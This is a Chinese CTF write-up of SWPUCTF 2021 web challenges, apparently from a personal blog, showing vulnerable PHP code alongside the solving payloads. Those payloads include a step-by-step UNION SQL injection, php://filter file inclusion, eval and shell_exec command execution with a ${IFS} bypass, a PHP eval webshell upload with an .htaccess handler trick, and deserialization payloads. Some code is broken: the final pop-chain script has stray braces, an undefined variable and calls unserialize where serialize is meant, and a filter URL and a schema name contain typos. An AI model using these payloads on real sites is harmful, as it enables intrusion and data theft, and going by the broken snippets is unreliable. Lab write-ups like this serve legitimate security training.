AceNyaRu

SWPUCTF 2021

  • ~9.22K 字

include

根据提示传一个file试试 /?file=1 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 <?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
    show_source(__FILE__);
    echo 'flag 在flag.php中';
}else{
    echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?> flag 在flag.php中

利用php伪协议来读取文件,php伪协议常见的几种有http:// https:// php:// file:// phar:// zip:// bzip2:// zlib:// data:// 等
这题利用?file=php://filter/read=convert.base64-encode/resource=flag.php (读取php文件要base64编码)

gift_F12

F12 注释里面有flag = "WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}"//flag is here

jicao

1
2
3
4
5
6
7
8
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true); //json解码
if ($id=="wllmNB"&&$json['x']=="wllm") //json[] 是json数组
{echo $flag;}
?>

以post,传入id=wllmNB get传入?json={"x":"wllm"}

easy_md5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 <?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){  
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>
wrong!

弱比较,可以用0e绕过,数组绕过(md5无法加密数组,返回NULL)
GET ?name[]=1
POST password[]=2

easy_sql

传参为wllm

1
2
3
4
5
6
7
1.  ?wllm=1'  //判断注入点
2.  ?wllm=1' order by 3-- +     //判断字段数
3.  ?wllm=-1' union select 1,2,3-- +    //回显点
4.  ?wllm=-1' union select 1,2,database()-- +   //查库名 test_db
5.  ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test.db'-- + //查表名 test_tb,users
6.  ?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' and table_schema='test_db'-- +  //查字段名 id,flag
7.  ?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb   //获得flag

caidao

蚁剑连一下

Do_you_know_http

用bp修改请求头
Please use 'WLLM' browser! User-Agent: WLLM
You can only read this at local!<br>Your address175.42.87.177 //只能在本地读取
xff X-Forwarded-For:127.0.0.1 获得flag

easyrce

1
2
3
4
5
6
7
8
 <?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

eval 把字符串作为PHP代码执行
PHP执行系统命令的有几个常用的函数,如:system函数、exec函数、popen函数、passthru、shell_exec函数等 详见
?system('ls /') bin boot dev etc flllllaaaaaaggggggg home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
?system('cat /flag')

easyupload1.0

上传.jpg,然后bp里面修改文件名为.php
<?php @eval ($_GET['cmd']);?>
./upload/cmd.php succesfully uploaded!
蚁剑怎么连不了?换一个
<?php phpinfo();?>
上传完直接访问路径 /upload/cmd.php
F12查找CTF{ 获得NSSCTF{ec814e35-b715-40c2-8f72-76f8efb8d677}

easyupload2.0

.php .php5 .htaccess这些都不行,利用.phtml上传成功,蚁剑还是连不了?
<?php phpinfo();?> 后续步骤跟上题一样

easyupload3.0

估计蚁剑还是不行喵,跟上面步骤一样,这次是.htaccess
.htaccess文件(或者分布式配置文件),全称是Hypertext Access(超文本入口)。 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 作为用户,所能使用的命令受到限制。
大概就是同文件夹的文件都会被解析成.php
.htaccess内容为

1
2
3
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>  //shell.jpg根据实际情况调换

接下来上传一个图片马

babyrce

1
2
3
4
5
6
7
8
9
10
11
 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)    //通过 HTTP Cookies 方式传递给当前脚本的变量的数组。
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

cookie editor加个name=admin,value=1
刷新页面rasalghul.php

1
2
3
4
5
6
7
8
9
10
11
12
13
 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip); //shell_exec — 通过 shell 执行命令并将完整的输出以字符串的方式返回
  echo $a;
}
?>

?url=ls; 获得* -la 1.php 1.txt 1.txt 1.txt a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php 1.txt a.out abc.txt aflllllaaaaaaggggggg flllllaaaaaaggggggg index.php rasalghul.php 2.txt a.out abc.txt aflllllaaaaaaggggggg con f* flag flllllaaaaaaggggggg index.php la rasalghul.php test test.php test.txt 怎么这么多喵?

学一只空格绕过喵
${IFS}代替空格
?url=cat${IFS}/flllllaaaaaaggggggg 获得flag

ez_unserialize

F12查看 User-agent: *Disallow: 什么东西呢? 搞不懂,先扫一下,扫出来cl45s.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

序列化一下对象类型:对象名长度:对象名:变量个数:{变量类型:变量名长度:变量名;......;}
获得payload ?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

no_wakeup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 <?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

__wakeup() 使用unserialize时触发,反序列化恢复对象之前调用该方法
unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。
传入参数p,绕过_wakeup,绕过参考CVE-2016-7124当序列化字符串中,变量个数的值大于真实值就会绕过
原序列化O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";},直接输入会得到0e8badd4ad37ed18f5277e01c66b5b39bb1c28faNo wake up
修改一下O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

PseudoProtocols

hint is hear Can you find out the hint.php?
读一下 php://filter/read=convert.base64-encode/source=hint.php

1
2
3
4
5
6
7
8
9
10
 <?php
ini_set("max_execution_time", "180");  //设置php的脚本超时时间为180秒
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){  //要传入一个文件,内容为`I want flag`
    echo "success\n";
    echo $flag;
}
?>

?a=data://text/plain;base64,***(I want flag的加密后)

pop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
  <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

w00m->w22m->w33m->w44m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';
}

class w22m{
    public $w00m;
    
    }
}

class w33m{
    public $w00m;
    public $w22m=Getflag;
    
    }
}
$a=new w22m;
$b=new w33m;
$b->w00m=$w44m;
$a->w00m=$b;
echo unserialize($a);
?>

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可